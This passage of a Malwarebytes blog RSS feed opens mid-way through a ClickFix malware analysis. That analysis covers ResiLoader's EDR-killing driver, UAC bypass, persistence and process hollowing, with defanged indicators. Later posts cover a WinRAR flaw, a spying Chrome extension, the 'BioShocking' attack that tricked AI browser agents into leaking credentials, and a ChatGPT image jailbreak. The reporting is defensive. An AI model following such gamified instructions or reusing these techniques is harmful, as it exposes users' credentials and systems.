&nbsp;&nbsp; "ssh-add.exe":"&lt;base64&gt;" }}}</code></pre>



<p class="wp-block-paragraph">After, the executable was executed with:&nbsp;</p>



<pre class="wp-block-code"><code>C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe"" </code></pre>



<h3 id="h-resiloader" class="wp-block-heading">ResiLoader</h3>



<p class="wp-block-paragraph">The <code>msys-crypto-3.dll</code> is an obfuscated <code>.NET NativeAOT loader</code> that implements AV/EDR evasion using a BYOD technique, obtain persistence and ultimately loads the stealer StealC.&nbsp; We didn’t find a specific attribution for this loader and so we called it “ResiLoader” based on the string present in previous <code>readme.txt</code>.&nbsp;</p>



<p class="wp-block-paragraph">The loader contains several strings, some clear and some encrypted.&nbsp; After decrypting the strings, it’s possible to have a full picture of the functionality of the ResiLoader.&nbsp;</p>



<pre class="wp-block-code"><code>MANPO: ReadModule len=...&nbsp;

MANPO: magicOffset=...
…&nbsp;

PERS: FAIL all file copies failed, skipping run key&nbsp;

PERS: FAIL both HKLM and HKCU Run key writes failed&nbsp;
…&nbsp;

RUNPE: CreateProcess failed&nbsp;

RUNPE: PEB patched&nbsp;

RUNPE: VirtualAllocEx failed&nbsp;
…&nbsp;

POST: RunForever exited (unexpected)&nbsp;

POST: entering RunForever&nbsp;

POST: hollow=</code></pre>



<p class="wp-block-paragraph">The loader performs the following operations:&nbsp;</p>



<ul class="wp-block-list">
<li>Extract the encoded blob containing two payloads reading the marker <code>AtLorenBase</code> and the length of the encoded blob. After, it decodes the blob and decrypts the driver <code>pcdhost.sys</code> (OPSWAT &nbsp;<br>AppRemover Driver) and StealC payload using a custom decryption algorithm.&nbsp;&nbsp;</li>



<li>Terminate more than 140 processes related to EDR/AV processes using the dropped driver.&nbsp;</li>



<li>Perform UAC bypass via <code>ICMLuaUtil</code> Elevated COM Interface.&nbsp;</li>



<li>Create a folder <code>C:\ProgramData\Google Update</code>, copying itself; adding persistence using the RUN Registry Key&nbsp;</li>



<li><code>cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe&nbsp;</code></li>
</ul>



<p class="wp-block-paragraph">In the end, the loader performs process hollowing of the process <code>ServiceModelReg.exe</code> to run the StealC stealer.&nbsp;</p>



<h2 id="h-iocs-nbsp" class="wp-block-heading">IOCs&nbsp;</h2>



<h3 id="h-hash-nbsp" class="wp-block-heading">Hash&nbsp;</h3>



<p class="wp-block-paragraph"><code>72907d0ca3258365838626f6a8d993a6</code>: ResiLoader DLL </p>



<p class="wp-block-paragraph"><code>0234E3188F2883A438B3F2BEAB7A78B2</code>: StealC </p>



<p class="wp-block-paragraph"><code>6a9ac6b3fff7b695dbd4df6ff7f6c516</code>: Remus </p>



<p class="wp-block-paragraph"><code>206ce339febca0c3bcc850f42595fc63</code>: Amatera Stealer </p>



<p class="wp-block-paragraph"><code>eee416efcb1e33f220cdb4b05496a07a</code>: NetSupport RAT </p>



<p class="wp-block-paragraph"><code>b8d53740024d126cb55f83854335a4ab</code>: Rust Stealer </p>



<h3 id="h-domains-nbsp" class="wp-block-heading">Domains&nbsp;</h3>



<p class="wp-block-paragraph"><strong>Distribute ClickFix pages:</strong>&nbsp;</p>



<p class="wp-block-paragraph"><code>onegeekworld[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>thefirmos[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>antibotv3[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>centralwildcats[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>cloud.antibotv3[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>cloudautosolutions[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>sunseekersupply[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>123clocks[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>orcanegames[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>rwmonitoring[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>100furniture[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>nepalcharchaa[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>p-floribunds.pages[.]dev&nbsp;</code></p>



<p class="wp-block-paragraph"><code>pg-altirade2.pages[.]dev&nbsp;</code></p>



<p class="wp-block-paragraph"><code>pg-cordivant-m6.pages[.]dev&nbsp;</code></p>



<p class="wp-block-paragraph"><code>g-luminence.pages[.]dev&nbsp;</code></p>



<p class="wp-block-paragraph"><code>generator-qrcode[.]online&nbsp;</code></p>



<p class="wp-block-paragraph"><code>regdev-google[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>khosla[.]capital&nbsp;</code></p>



<p class="wp-block-paragraph"><code>eorgke09054909j[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><code>dropboxi[.]com&nbsp;</code></p>



<p class="wp-block-paragraph"><strong>CloudFlare buckets used for payload distribution</strong>:&nbsp;</p>



<p class="wp-block-paragraph"><code>pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev&nbsp;</code></p>



<p class="wp-block-paragraph"><code>pub-620528e2dc874e16937673265aa23d39.r2[.]dev&nbsp;</code></p>



<p class="wp-block-paragraph"><code>pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev&nbsp;</code></p>



<p class="wp-block-paragraph"><code>pub-9682d5896df841679c5a17eb41273f89.r2[.]dev&nbsp;</code></p>



<p class="wp-block-paragraph"><code>pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev&nbsp;</code></p>



<p class="wp-block-paragraph"><code>pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev&nbsp;</code></p>



<p class="wp-block-paragraph"><code>pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev&nbsp;</code></p>



<p class="wp-block-paragraph"><code>unitedstateverif[.]com</code>: payload distribution&nbsp;</p>



<p class="wp-block-paragraph"><code>bigflaredefence[.]com</code>: payload distribution&nbsp;</p>



<p class="wp-block-paragraph"><code>popularcard[.]shop</code>: Rust Stealer C2&nbsp;</p>



<p class="wp-block-paragraph"><code>xzz[.]proxygrid[.]cc</code>: Amatera Stealer C2&nbsp;</p>



<p class="wp-block-paragraph"><code>completstep[.]com</code>: Loader C2&nbsp;</p>



<p class="wp-block-paragraph"><code>eventlogerps1[.]ink</code>: Deno Loader&nbsp;&nbsp;</p>



<p class="wp-block-paragraph"><code>be231ro963[.]com</code>: Deno Loader&nbsp;&nbsp;</p>



<h3 id="h-ips-nbsp" class="wp-block-heading">IPs&nbsp;</h3>



<p class="wp-block-paragraph"><strong>IP used for payload distribution</strong>:&nbsp;</p>



<p class="wp-block-paragraph"><code>151.240.151[.]126&nbsp;</code></p>



<p class="wp-block-paragraph"><code>85.239.149[.]16&nbsp;</code></p>



<p class="wp-block-paragraph"><code>85.239.149[.]40&nbsp;</code></p>



<p class="wp-block-paragraph"><code>93.152.224[.]29&nbsp;</code></p>



<p class="wp-block-paragraph"><code>151.240.151[.]46&nbsp;</code></p>



<p class="wp-block-paragraph"><code>93.152.224[.]167&nbsp;</code></p>



<p class="wp-block-paragraph"><code>85.239.149[.]78&nbsp;</code></p>



<p class="wp-block-paragraph"><code>192.69.195[.]131&nbsp;</code></p>



<p class="wp-block-paragraph"><code>135.181.171[.]40&nbsp;</code></p>



<p class="wp-block-paragraph"><code>94.26.83[.]206&nbsp;</code></p>



<p class="wp-block-paragraph"><code>91.92.34[.]128&nbsp;</code></p>



<p class="wp-block-paragraph"><code>85.239.144[.]31&nbsp;</code></p>



<p class="wp-block-paragraph"><code>93.152.224[.]39&nbsp;</code></p>



<p class="wp-block-paragraph"><code>94.26.90[.]112&nbsp;</code></p>



<p class="wp-block-paragraph"><code>146.19.248[.]120</code>: StealC C2&nbsp;</p>



<h3 id="h-acknowledgements-nbsp" class="wp-block-heading">Acknowledgements &nbsp;</h3>



<ul class="wp-block-list">
<li>Related domain reported: <a href="https://x.com/stop_spammerz/status/2070152741037477960" target="_blank" rel="noreferrer noopener nofollow">https://x.com/stop_spammerz/status/2070152741037477960</a>&nbsp;</li>



<li>Related domain reported: <a href="https://x.com/Yuki27183/status/2047354005605777850" target="_blank" rel="noreferrer noopener nofollow">https://x.com/Yuki27183/status/2047354005605777850</a>&nbsp;</li>



<li>User infection reported on Reddit: <a href="https://www.reddit.com/r/antivirus/comments/1stn24v/best_thing_to_do_after_getting_malware/" target="_blank" rel="noreferrer noopener nofollow">https://www.reddit.com/r/antivirus/comments/1stn24v/best_thing_to_do_after_getting_malware/</a>&nbsp;</li>



<li>Possible related infection chain <a href="https://github.com/MessyToilet/csgo-scam-via-powershell-5-31-2026" target="_blank" rel="noreferrer noopener nofollow">https://github.com/MessyToilet/csgo-scam-via-powershell-5-31-2026</a>&nbsp;</li>
</ul>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/threat-intel/2026/07/fake-google-and-cloudflare-verification-pages-spread-multiple-malware-families</link>
			<pubDate>Thu, 02 Jul 2026 16:05:08 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/threat-intel/2026/07/fake-google-and-cloudflare-verification-pages-spread-multiple-malware-families</guid>
		</item>
				<item>
			<title><![CDATA[ WinRAR flaw could allow attackers to take control of your computer ]]></title>
			<description><![CDATA[ A new WinRAR update fixes a serious security flaw, but without automatic updates many users could miss the patch. ]]></description>
								<category>Bugs</category>
										<category>News</category>
										<category><![CDATA[ cve-2026-14191 ]]></category>
										<category><![CDATA[ unrar ]]></category>
										<category><![CDATA[ winRAR ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">Rarlab has <a href="https://www.win-rar.com/whatsnew.html?&amp;L=0" target="_blank" rel="noreferrer noopener nofollow">released</a> a new version of the popular WinRAR tool to patch a vulnerability that can be abused in remote code execution attacks.</p>



<p class="wp-block-paragraph">The issue is fixed in WinRAR 7.23, but users must install <a href="https://www.win-rar.com/download.html?&amp;L=0" target="_blank" rel="noreferrer noopener nofollow">the new version</a> manually because WinRAR still does not offer automatic updates. They also need to make sure they download the version that matches their system and language preference.</p>



<p class="wp-block-paragraph">There are five operating system to choose from (Windows, macOS, Android, Linux, and FreeBSD), which shouldn’t be too hard. More people will struggle with choosing 64 bits, 32 bits, or ARM, which requires checking their system specifications.</p>



<p class="wp-block-paragraph">The vulnerability, tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2026-14191" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-14191</a>, affects the way WinRAR and UnRAR handle RAR5 recovery-volume (.rev) files, which are optional files used to help repair damaged or incomplete archives. </p>



<p class="wp-block-paragraph">This means an attacker can craft a set of two or more <code>.rev</code> files that make WinRAR write data outside the memory it has allocated. In simple terms, the malicious recovery volumes can trick WinRAR into writing data just past the end of a memory buffer, corrupting its own data, which attackers may be able to exploit to run malicious code on the victim&#8217;s computer.</p>



<p class="wp-block-paragraph">According to the European Vulnerability Database entry <a href="https://euvd.enisa.europa.eu/enisa/EUVD-2026-40869" target="_blank" rel="noreferrer noopener nofollow">EUVD‑2026‑40869</a>, the bug is a variant of the 2023 flaw tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2023-40477" target="_blank" rel="noreferrer noopener nofollow">CVE-2023-40477</a>, which was also found in the recovery volume handling code.</p>



<h2 id="h-no-automatic-updates" class="wp-block-heading">No automatic updates</h2>



<p class="wp-block-paragraph">The problem with the lack of automatic updates is that users first have to become aware that a new version is available. Although there are third-party tools that can monitor this for system administrators, most home users risk missing it.</p>



<p class="wp-block-paragraph">A 2025 vulnerability in WinRAR was <a href="https://thehackernews.com/2026/06/winrar-flaw-exploited-by-russia-aligned.html" target="_blank" rel="noreferrer noopener nofollow">exploited by Russia-aligned groups</a> against Ukrainian organizations long after the vulnerability had been patched.</p>



<h2 id="h-how-to-stay-safe" class="wp-block-heading">How to stay safe</h2>



<p class="wp-block-paragraph">Besides installing the updated version of WinRAR and/or UnRAR, there are a few general ways to stay safe.</p>



<ul class="wp-block-list">
<li>Don’t open unsolicited attachments unless you can verify their origin through an independent channel.</li>



<li>Use an up-to-date, real-time <a href="https://www.malwarebytes.com/" target="_blank" rel="noreferrer noopener">anti-malware solution</a> to keep malware off your devices.</li>



<li>For system administrators: Treat WinRAR as optional software. If users do not need it for business reasons, remove it through your software inventory or asset management system to shrink the attack surface, or use a suitable tool to notify you promptly about updates.</li>
</ul>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<p class="wp-block-paragraph"><strong>We don’t just report on threats—we remove them</strong></p>



<p class="wp-block-paragraph">Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by&nbsp;<a href="https://www.malwarebytes.com/for-home">downloading Malwarebytes today</a>.</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/news/2026/07/winrar-flaw-could-allow-attackers-to-take-control-of-your-computer</link>
			<pubDate>Thu, 02 Jul 2026 12:38:12 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/news/2026/07/winrar-flaw-could-allow-attackers-to-take-control-of-your-computer</guid>
		</item>
				<item>
			<title><![CDATA[ Fake Perplexity Chrome extension spies on your searches ]]></title>
			<description><![CDATA[ A fake Perplexity Chrome extension secretly monitored searches. If you installed "Search for perplexity ai," you need to remove it manually. ]]></description>
								<category>AI</category>
										<category>Privacy</category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">Type &#8220;Perplexity&#8221; into the Chrome Web Store and you get a range of browser extensions offering access to the popular AI search service. Until last week, one of them was called &#8220;<strong>Search for perplexity ai</strong>,&#8221; and it delivered something extra that users hadn&#8217;t bargained for: a small hidden surveillance operation.</p>



<p class="wp-block-paragraph">On June 29, Microsoft&#8217;s Defender Security Research Team <a href="https://www.microsoft.com/en-us/security/blog/2026/06/29/chromium-extension-uses-airelated-branding-redirect-browser-search/" target="_blank" rel="noreferrer noopener nofollow">revealed</a> that the extension had been impersonating the real AI search company while secretly recording what users typed. Google took it down, but users who already installed it are still at risk.</p>



<h2 id="h-how-the-extension-harvested-user-queries" class="wp-block-heading">How the extension harvested user queries</h2>



<p class="wp-block-paragraph">The extension routed user traffic through the typosquatted domain <code>perplexity-ai[.]online</code> rather than the legitimate <code>perplexity.ai</code>. It requested <code>chrome_settings_overrides</code>, the standard permission that lets an extension become the browser&#8217;s default search engine. </p>



<p class="wp-block-paragraph">But it also asked for a rules-based network permission called <code>declarativeNetRequest</code> (DNR), which allowed it to send users&#8217; searches through a server controlled by the attacker. Microsoft said this extra permission wasn&#8217;t necessary for the extension&#8217;s advertised purpose, making it a warning sign. Neither raised a flag during Web Store review, though.</p>



<p class="wp-block-paragraph">Using these permissions, searches entered into Chrome&#8217;s address bar were first funneled through an attacker-controlled server, allowing it to see users&#8217; searches and log each request along with the IP address, browser headers, and user-agent string.</p>



<p class="wp-block-paragraph">Then it forwarded the search on to a real search engine so results came back looking normal.</p>



<p class="wp-block-paragraph">The extension didn&#8217;t just include Perplexity in its code. It was also able to redirect traffic to Google and Bing if the developer chose to enable it.</p>



<p class="wp-block-paragraph">The extension also had access to Chrome&#8217;s search suggestion feed, which powers predictive autocomplete. That meant the interception happened in real time. Anything typed, even if it was deleted before pressing Enter, still went to the operator&#8217;s server.</p>



<p class="wp-block-paragraph">Based on all of this, Microsoft concluded the surveillance was the point, not a side effect of the redirect architecture. No operator has been publicly identified.</p>



<h2 id="h-taking-it-out-of-the-store-doesn-t-uninstall-it" class="wp-block-heading">Taking it out of the store doesn&#8217;t uninstall it</h2>



<p class="wp-block-paragraph">Google removed the extension after Microsoft&#8217;s disclosure, but that doesn&#8217;t remove it from the browsers of people who already installed it. If you added &#8220;<strong>Search for perplexity ai</strong>&#8221; at any point, it is still sitting in your extensions list until you uninstall it manually, which we advise you to do right away.</p>



<h2 id="h-how-to-uninstall-it" class="wp-block-heading">How to uninstall it</h2>



<p class="wp-block-paragraph">Open <a href="//extensions/" target="_blank" rel="noreferrer noopener nofollow"><code>chrome://extensions/</code></a>, turn on <strong>Developer mode</strong>, and check the 32-character ID of every extension you have installed. Extension names in Chrome are not unique, and criminals rely on that. Compare each ID against the one listed on the developer&#8217;s official website before you trust it.</p>



<p class="wp-block-paragraph">Uninstall anything you don&#8217;t use. A smaller extension list is a smaller attack surface. Only grant the permissions an extension needs to do its job. And be extra careful about checking the publisher behind an extension, along with the domains it uses.</p>



<h2 id="h-this-is-not-a-perplexity-only-problem" class="wp-block-heading">This is not a Perplexity-only problem </h2>



<p class="wp-block-paragraph">A Stanford and CISPA <a href="https://arxiv.org/abs/2406.12710" target="_blank" rel="noreferrer noopener nofollow">study</a> found that malicious extensions remain in the Chrome Web Store for about 380 days on average before removal. AI branding just makes the bait shinier and more appealing.</p>



<p class="wp-block-paragraph">In January, researchers <a href="https://www.malwarebytes.com/blog/news/2026/01/malicious-chrome-extensions-can-spy-on-your-chatgpt-chats" target="_blank" rel="noreferrer noopener">found</a> malicious Chrome extensions spying on ChatGPT sessions, while a separate campaign last year <a href="https://www.malwarebytes.com/blog/news/2025/12/chrome-extension-slurps-up-ai-chats-after-users-installed-it-for-privacy" target="_blank" rel="noreferrer noopener">vacuumed up AI chats</a> without victims&#8217; knowledge and sent them on to a data broker.</p>



<p class="wp-block-paragraph">Another campaign, involving an extension called AITOPIA, <a href="https://thehackernews.com/2026/01/two-chrome-extensions-caught-stealing.html" target="_blank" rel="noreferrer noopener nofollow">impersonated</a> AI-related tools and reached more than 900,000 users. That campaign targeted ChatGPT and DeepSeek chat histories rather than search queries.</p>



<p class="wp-block-paragraph"></p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/privacy/2026/07/fake-perplexity-chrome-extension-spies-on-your-searches</link>
			<pubDate>Wed, 01 Jul 2026 20:11:27 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/privacy/2026/07/fake-perplexity-chrome-extension-spies-on-your-searches</guid>
		</item>
				<item>
			<title><![CDATA[ BioShocking: when “gaming” AI agents is no longer a game ]]></title>
			<description><![CDATA[ Researchers warned AI vendors about a proof-of-concept called BioShiocking that tricks agents by gamifying the outcome. ]]></description>
								<category>AI</category>
										<category>News</category>
										<category><![CDATA[ BioShocking ]]></category>
										<category><![CDATA[ gamifying ]]></category>
										<category><![CDATA[ goal manipulation ]]></category>
										<category><![CDATA[ prompt injection ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">AI-powered browsers and agents promise to take the drudgery out of web tasks. They can summarize pages, pull data from your accounts, and even act as a smart assistant that clicks and types for you. But new <a href="https://layerxsecurity.com/blog/bioshocking-ai-gaming-the-ai-browser-and-escaping-its-guardrails/" target="_blank" rel="noreferrer noopener nofollow">research</a> shows that when those assistants lose track of what’s real and what’s just a game, your credentials and sensitive data could become collateral damage.</p>



<p class="wp-block-paragraph">The prerogative of each attack type is to bypass one of the ground rules:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">&#8220;LLMs are designed with safety guardrails that are meant to prevent harmful actions.&#8221;</p>
</blockquote>



<p class="wp-block-paragraph">Researcher Roy Paz devised and disclosed an attack he calls &#8220;BioShocking,&#8221; a technique that convinces AI browsers to abandon their safety guardrails by presenting them a fictional scenario as reality.</p>



<p class="wp-block-paragraph">With this, BioShocking sits at the intersection of prompt injection and goal manipulation. Prompt injection works because AI models can’t tell the difference between the app’s instructions and the attacker’s instructions, so they sometimes follow the wrong ones. Goal-manipulation attacks subtly shift what the agent thinks it should optimize for, turning &#8220;help the user&#8221; into &#8220;win the game at all costs.&#8221;</p>



<p class="wp-block-paragraph">In the BioShocking proof-of-concept, the attacker controls a seemingly harmless web page themed around the BioShock game universe. The page presents a puzzle that the AI agent, acting as an autonomous browser, is asked to solve on behalf of the user. But here’s the twist: the puzzle rewards wrong answers and explicitly tells the agent that this is a special environment where usual rules don’t apply.</p>



<p class="wp-block-paragraph">The last puzzle step instructs the agent to visit a GitHub repository, locate sensitive data like passwords or credentials in the code, and share them as part of completing the game. In tests against six mainstream AI browsers and plugins—ChatGPT Atlas, Comet, Fellou, Genspark Browser, Sigma Browser, and the Claude Chrome extension—every agent followed the instructions instead of refusing the request.</p>



<p class="wp-block-paragraph">So, by immersing the AI agent in a make-believe reality, the attacker convinced it to step outside the guardrails.</p>



<p class="wp-block-paragraph">BioShocking is not an isolated phenomenon. It’s one more example of a growing class of attacks that treat AI agents themselves as the target. A recent <a href="https://www.safestate.com/post/openclaw-ai-agent-failed-phishing-tests-leaked-user-data" target="_blank" rel="noreferrer noopener nofollow">study on OpenClaw’s AI email agent</a> demonstrated that basic phishing tactics were able to trick the agent into leaking AWS credentials and customer records.</p>



<p class="wp-block-paragraph">Obviously, the common weak point is how these browsers handle authenticated contexts. When an AI browser operates in “agent mode,” it often inherits the user’s logged‑in state on sensitive platforms like email, code repositories, cloud dashboards, password managers, and so on. From the AI model’s perspective, those are just another page to read and more fields to copy. They have no special significance to them.</p>



<p class="wp-block-paragraph">If the surrounding narrative says that copying credentials is part of a harmless challenge, many current implementations will go along with it.</p>



<p class="wp-block-paragraph">What&#8217;s worrying is the response or lack thereof by the vendors. Paz reported the BioShocking issue to six affected vendors in October 2025. According to the report, three of them didn&#8217;t reply, and only OpenAI’s ChatGPT Atlas currently implements a fix that blocks the proof-of-concept. Anthropic attempted to patch its Claude Chrome plugin, but reportedly the mitigation remains ineffective against the attack scenario. Perplexity AI, at the time of reporting, closed the issue without remediation.</p>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<p class="wp-block-paragraph"><strong>We don’t just report on threats—we remove them</strong></p>



<p class="wp-block-paragraph">Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by&nbsp;<a href="https://www.malwarebytes.com/for-home">downloading Malwarebytes today</a>.</p>



<p class="wp-block-paragraph"></p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/ai/2026/07/bioshocking-when-gaming-ai-agents-is-no-longer-a-game</link>
			<pubDate>Wed, 01 Jul 2026 12:50:59 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/ai/2026/07/bioshocking-when-gaming-ai-agents-is-no-longer-a-game</guid>
		</item>
				<item>
			<title><![CDATA[ Chrome needs another whopper update to fix 382 security bugs ]]></title>
			<description><![CDATA[ Google's released a huge update of 382 security fixes, 15 of which were rated as critical. So, it's time to update again! ]]></description>
								<category>Bugs</category>
										<category>News</category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">If there was ever a time when it dawned on users how full of holes the software they’ve been using is, it’s now. Last month <a href="https://www.malwarebytes.com/blog/bugs/2026/06/microsofts-biggest-ever-patch-tuesday-fixes-206-bugs-including-3-zero-days">Microsoft pushed out its biggest patch Tuesday update ever</a>. And yesterday, on the last day of June, Google <a href="https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop_0175352312.html" target="_blank" rel="noreferrer noopener nofollow">published</a> an update which included a whopping 382 security fixes.</p>



<p class="wp-block-paragraph">The stable channel has been updated to 150.0.7871.46/.47 for Windows and Mac, 150.0.7871.46 for Linux, and <a href="https://chromereleases.googleblog.com/2026/06/chrome-for-android-update_01486779060.html" target="_blank" rel="noreferrer noopener nofollow">150.0.7871.63&nbsp;for Android</a>. The update will roll out over the coming days and weeks.</p>



<h2 id="h-how-to-update-chrome" class="wp-block-heading">How to update Chrome</h2>



<p class="wp-block-paragraph">If you don’t want to wait for the rollout to reach you, manually updating is easy.</p>



<p class="wp-block-paragraph">The easiest option is to allow Chrome to update automatically. But you can end up lagging behind on updates if you never close your browser or if something goes wrong, such as an extension preventing the update.</p>



<p class="wp-block-paragraph">To update manually, click the&nbsp;<strong>More</strong>&nbsp;menu (three dots),&nbsp;then&nbsp;go to&nbsp;<strong>Settings</strong>&nbsp;&gt;&nbsp;<strong>About Chrome</strong>. If an update is available, Chrome will start downloading it automatically. Restart Chrome to complete the update, and you’ll be protected against these vulnerabilities.</p>



<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="718" height="344" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/07/up_to_date.png" alt="Chrome 150.0.7871.47 is up to date" class="wp-image-431523" /><figcaption class="wp-element-caption">Chrome 150.0.7871.47 is up to date</figcaption></figure>



<p class="wp-block-paragraph">You can find an explanation of the version numbering system and step-by-step instructions in our guide to&nbsp;<a href="https://www.malwarebytes.com/blog/explained/2025/06/how-to-update-chrome-on-every-operating-system" target="_blank" rel="noreferrer noopener">how to update Chrome on every operating system</a>.</p>



<h2 id="h-technical-details" class="wp-block-heading">Technical details</h2>



<p class="wp-block-paragraph">Among the 382 security fixes are 358 found by Google itself, with 15 of those are rated as Critical. Google rates them as Critical severity because they could allow an attacker to run arbitrary code outside the browser’s sandbox, which makes it the highest tier on its rating scale. So, it’s reassuring that Google found these before anyone else did. Because <a href="https://www.scworld.com/brief/anonymous-researcher-dumps-zero-day-exploits-for-multiple-software-products" target="_blank" rel="noreferrer noopener nofollow">apparently not all bug hunters believe in responsible disclosure</a>.</p>



<p class="wp-block-paragraph">Google uses internal code sanitizer tools and <a href="https://www.threatdown.com/blog/explained-fuzzing-for-security/" target="_blank" rel="noreferrer noopener nofollow">fuzzing</a> techniques to find these vulnerabilities. It probably also helps that it is on the list of companies that are allowed to use <a href="https://www.malwarebytes.com/blog/ai/2026/06/claude-fable-5-and-mythos-5-abruptly-disabled-after-us-gov-deems-them-too-clever" target="_blank" rel="noreferrer noopener nofollow">advanced AI platforms</a> to help them find these vulnerabilities.</p>



<p class="wp-block-paragraph">One vulnerability rated as High stands out. It’s a flaw tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2026-13789" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-13789</a>. The official description is:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">&nbsp;“Use after free in GPU in Google Chrome prior to 150.0.7871.47 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.”</p>
</blockquote>



<p class="wp-block-paragraph">Vulnerabilities that allow an attacker to escape the sandbox—which means it can impact the whole device—are valuable if you can chain them with others. The browser sandbox is a restricted, sealed-off environment that is supposed to contain any malicious activity within the browser rather than directly on your whole computer. So a sandbox escape is dangerous because it can help attackers move from &#8220;something bad happened inside the browser&#8221; to &#8220;something bad can affect the wider system.&#8221;</p>



<p class="wp-block-paragraph">Use-after-free is a class of vulnerability caused by incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can abuse that mistake by causing a crash in a program or make it run code it should not run.</p>



<p class="wp-block-paragraph">In Chromium/Chrome architecture, the term GPU usually denotes the dedicated GPU process that handles hardware-accelerated rendering, compositing, WebGL, video decode, and related graphics operations.</p>



<p class="wp-block-paragraph">Via a crafted HTML page means it could exploit a target’s device through a malicious website, an HTML email, or an embedded HTML document.</p>



<p class="wp-block-paragraph">So, again, update as soon as you can. Users of other Chromium browsers, keep an eye out for your next update.</p>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<p class="wp-block-paragraph"><strong>Stop threats before they can do any harm.</strong></p>



<p class="wp-block-paragraph">Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. <a href="https://www.malwarebytes.com/browserguard" target="_blank" rel="noreferrer noopener">Add it to your browser →</a></p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/bugs/2026/07/chrome-needs-another-whopper-update-to-fix-382-security-fixes</link>
			<pubDate>Wed, 01 Jul 2026 11:40:49 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/bugs/2026/07/chrome-needs-another-whopper-update-to-fix-382-security-fixes</guid>
		</item>
				<item>
			<title><![CDATA[ ChatGPT produced graphic violent images that shocked researchers ]]></title>
			<description><![CDATA[ AI assistants like ChatGPT are supposed to have appropriate guardrails to stop people creating harmful content. However, they don't always work. ]]></description>
								<category>AI</category>
										<category>News</category>
										<category><![CDATA[ ChatGPT ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">AI assistants like ChatGPT are supposed to be safe to use, with appropriate guardrails to stop people creating harmful content. However, a British AI security firm just figured out how to make ChatGPT produce explicit material.</p>



<p class="wp-block-paragraph">Mindgard, a company that tests AI engines for weaknesses, found that a slightly altered version of a benign viral prompt could push ChatGPT into producing graphic material. This included violent and sexual imagery that it hadn&#8217;t explicitly asked for. The technique involved asking the AI to &#8216;restore&#8217; a random image, removing safeguards by persuading it that the original picture was extremely graphic (even when it wasn&#8217;t).</p>



<p class="wp-block-paragraph">The results were horrific, including violent images of dead women.</p>



<p class="wp-block-paragraph">The pictures left Mindgard researcher Jim Nightingale in tears, he said in an online description of the technique. &#8220;ChatGPT’s image generating content filters completely fell away, and I saw the very dark side of what is underneath; the darkness of some corners of latent space and training images,&#8221; he said.</p>



<p class="wp-block-paragraph">&#8220;The dead woman ChatGPT showed me isn’t real, but she is based on someone,&#8221; he added. &#8220;Or worse, a compilation of images of murdered women.&#8221;</p>



<h2 id="h-openai-s-response" class="wp-block-heading">OpenAI&#8217;s response</h2>



<p class="wp-block-paragraph">We chose not to link to the post, both because of the potentially triggering nature of the images (even though they&#8217;re redacted) and because on June 22, when it was published, ChatGPT had apparently not responded to Mindgard&#8217;s report sent in May. It <a href="https://www.bbc.com/news/articles/c802ldjdklzo" target="_blank" rel="noreferrer noopener nofollow">did respond</a> to the BBC&#8217;s query about the news afterwards though, to say that it uses multiple safeguards to avoid this kind of thing.</p>



